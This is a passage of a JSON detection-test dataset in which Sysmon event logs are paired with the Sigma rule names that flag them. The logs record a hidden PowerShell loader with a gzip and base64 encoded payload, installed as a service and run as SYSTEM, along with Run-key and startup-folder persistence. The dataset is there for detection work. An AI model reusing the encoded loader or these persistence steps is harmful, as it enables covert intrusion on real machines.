22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution_attributes":{"ProcessID":10204,"ThreadID":2096},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution_attributes":{"ProcessID":1580,"ThreadID":2324},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution_attributes":{"ProcessID":2020,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 